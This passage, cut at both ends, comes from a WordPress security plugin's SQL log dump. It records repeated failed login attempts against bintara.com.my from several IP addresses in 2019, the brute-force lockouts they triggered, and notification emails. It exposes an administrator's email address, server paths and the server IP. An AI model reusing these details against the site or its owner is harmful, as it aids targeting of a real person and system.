empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYkTXkXpgmG5P@iB8kxqAAAAIE\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"188.120.254.133\";s:11:\"REMOTE_PORT\";s:5:\"52384\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYkTXkXpgmG5P@iB8kxqAAAAIE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072206.0739\";s:12:\"REQUEST_TIME\";s:10:\"1569072206\";}}','notice','2019-09-21 13:23:27','2019-09-21 13:23:26',17801080,19293736,'https://bintara.com.my/blog/wp-login.php',1,0,'188.120.254.133'),(25890,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:23:26\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:23:26\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:38:26\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:38:26\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:23:27','2019-09-21 13:23:26',17884304,19293736,'https://bintara.com.my/blog/wp-login.php',1,0,'188.120.254.133'),(25891,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:23:27','2019-09-21 13:23:26',18090216,19293736,'https://bintara.com.my/blog/wp-login.php',1,0,'188.120.254.133'),(25892,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYkUliJ7D9Gn7wDPh8hIgAAANY\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"81.177.33.4\";s:11:\"REMOTE_PORT\";s:5:\"36063\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYkUliJ7D9Gn7wDPh8hIgAAANY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072211.0556\";s:12:\"REQUEST_TIME\";s:10:\"1569072211\";}}','notice','2019-09-21 13:23:32','2019-09-21 13:23:31',17801664,19291416,'https://bintara.com.my/2019/wp-login.php',1,0,'81.177.33.4'),(25893,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:23:31\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:23:31\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:38:31\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:38:31\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:23:32','2019-09-21 13:23:31',17886344,19291416,'https://bintara.com.my/2019/wp-login.php',1,0,'81.177.33.4'),(25894,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:23:32','2019-09-21 13:23:31',18092568,19291416,'https://bintara.com.my/2019/wp-login.php',1,0,'81.177.33.4'),(25895,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYkXHkXpgmG5P@iB8kxuQAAAIs\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.28.163\";s:11:\"REMOTE_PORT\";s:5:\"36610\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYkXHkXpgmG5P@iB8kxuQAAAIs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072220.6943\";s:12:\"REQUEST_TIME\";s:10:\"1569072220\";}}','notice','2019-09-21 13:23:41','2019-09-21 13:23:41',17799128,19290304,'https://bintara.com.my/blog/wp-login.php',1,0,'13.127.28.163'),(25896,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:23:41\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:23:41\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:38:41\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:38:41\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:23:41','2019-09-21 13:23:41',17883856,19290304,'https://bintara.com.my/blog/wp-login.php',1,0,'13.127.28.163'),(25897,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:23:41','2019-09-21 13:23:41',18089768,19290304,'https://bintara.com.my/blog/wp-login.php',1,0,'13.127.28.163'),(25898,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYkc3kXpgmG5P@iB8kxxAAAAJg\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"178.62.155.249\";s:11:\"REMOTE_PORT\";s:5:\"60545\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYkc3kXpgmG5P@iB8kxxAAAAJg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072243.8003\";s:12:\"REQUEST_TIME\";s:10:\"1569072243\";}}','notice','2019-09-21 13:24:05','2019-09-21 13:24:04',17795744,19286328,'https://bintara.com.my/wp/wp-login.php',1,0,'178.62.155.249'),(25899,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:24:04\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:24:04\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:39:04\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:39:04\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:24:05','2019-09-21 13:24:04',17880576,19286328,'https://bintara.com.my/wp/wp-login.php',1,0,'178.62.155.249'),(25900,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:24:05','2019-09-21 13:24:04',18086272,19286328,'https://bintara.com.my/wp/wp-login.php',1,0,'178.62.155.249'),(25901,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYkg3kXpgmG5P@iB8kxyQAAAIw\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"45.252.248.161\";s:11:\"REMOTE_PORT\";s:5:\"40588\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYkg3kXpgmG5P@iB8kxyQAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072259.6145\";s:12:\"REQUEST_TIME\";s:10:\"1569072259\";}}','notice','2019-09-21 13:24:20','2019-09-21 13:24:20',17797608,19288456,'https://bintara.com.my/wordpress/wp-login.php',1,0,'45.252.248.161'),(25902,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:24:20\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:24:20\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:39:20\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:39:20\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:24:20','2019-09-21 13:24:20',17882336,19288456,'https://bintara.com.my/wordpress/wp-login.php',1,0,'45.252.248.161'),(25903,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:24:20','2019-09-21 13:24:20',18088056,19288456,'https://bintara.com.my/wordpress/wp-login.php',1,0,'45.252.248.161'),(25904,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYkmFiJ7D9Gn7wDPh8hLgAAAMo\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.95.126\";s:11:\"REMOTE_PORT\";s:5:\"60768\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYkmFiJ7D9Gn7wDPh8hLgAAAMo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072280.8372\";s:12:\"REQUEST_TIME\";s:10:\"1569072280\";}}','notice','2019-09-21 13:24:42','2019-09-21 13:24:41',17801352,19291136,'https://bintara.com.my/test/wp-login.php',1,0,'149.202.95.126'),(25905,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login 